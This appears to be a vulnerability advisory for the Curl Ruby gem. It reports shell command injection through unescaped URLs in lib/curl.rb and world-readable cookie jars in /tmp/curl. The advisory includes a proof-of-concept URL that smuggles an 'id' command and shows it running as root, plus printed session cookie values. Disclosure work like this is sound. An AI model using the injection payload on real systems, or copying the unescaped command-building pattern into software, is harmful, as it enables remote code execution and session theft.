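Title: Curl Ruby Gem Remote command execution
Specially crafted URLs can result in remote code execution, because the gem places the URL into a shell command line without escaping it. Escaping each argument (for example with Shellwords.escape) or running curl without a shell would close this hole.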

The vulnerable code is in ./lib/curl.rb, where the following lines build the command string by interpolation and pass it to open_pipe:

131       cmd = "curl #{cookies_store} #{browser_type} #{@setup_params} {ref}  \"{url}\"  "
132         if @debug
133                 puts cmd.red
134         end
135         result = open_pipe(cmd)

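This gem also stores cookie data insecurely in /tmp. The cookie jars are written under /tmp/curl, and both the directory (drwxr-xr-x) and the .jar files (-rw-r--r--) are readable by every local user, so session cookies are exposed to other accounts on the host: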
root@underfl0w:/tmp# ls -ld curl
drwxr-xr-x 2 root root 4096 Mar 12 18:35 curl
root@underfl0w:/tmp# ls -ld /tmp/curl
drwxr-xr-x 2 root root 4096 Mar 12 18:35 /tmp/curl
root@underfl0w:/tmp# ls -la curl/curl_0.*
-rw-r--r-- 1 root root 428 Mar 12 18:44 curl/curl_0.287351232063069_0.217269869500322.jar
-rw-r--r-- 1 root root 428 Mar 12 18:25 curl/curl_0.564885403765839_0.0415036222928075.jar
root@underfl0w:/tmp# cat /tmp/curl/curl_0.*
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

.google.com	TRUE	/	FALSE	1426199640	PREF	ID=c637a1a53176d2bd:FF=0:TM=1363127640:LM=1363127640:S=XG_kBQswSvKUKY5m
#HttpOnly_.google.com	TRUE	/	FALSE	1378938840	NID	67=kOUx2FhV6OQ6MSybmqD5vZMSI3gH8jB22AC4ReeIoqZHbao8zkejJncER8YznFgSVes6_MfqBJpgyPdR1snw3POtLL1Nr96RsQqHcdv6v6rkSmj_Z2XmVakZ95Rt1wMC
# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

.google.com	TRUE	/	FALSE	1426198990	PREF	ID=ca381d47b3f5aec2:FF=0:TM=1363126990:LM=1363126990:S=HrBfHkxDYMih4kfC
#HttpOnly_.google.com	TRUE	/	FALSE	1378938190	NID	67=ozR4v4tBjG9kUmFshdYLu7h0Z_fyXBpTrABHtlJYbEpkB1czXMKEGa_S5t3rMBbunYIeEaguy3l1fOkfWqFni_ajjxipoyNK4taRefp977i7yV_xc4GIEtP-OQuRCydF
root@underfl0w:/tmp# 
page = curl.get("http://vapid.dhs.org/\"\;id\/tmp\/p\;\"")

larry@underfl0w:/tmp$ cat p
uid=0(root) gid=0(root) groups=0(root)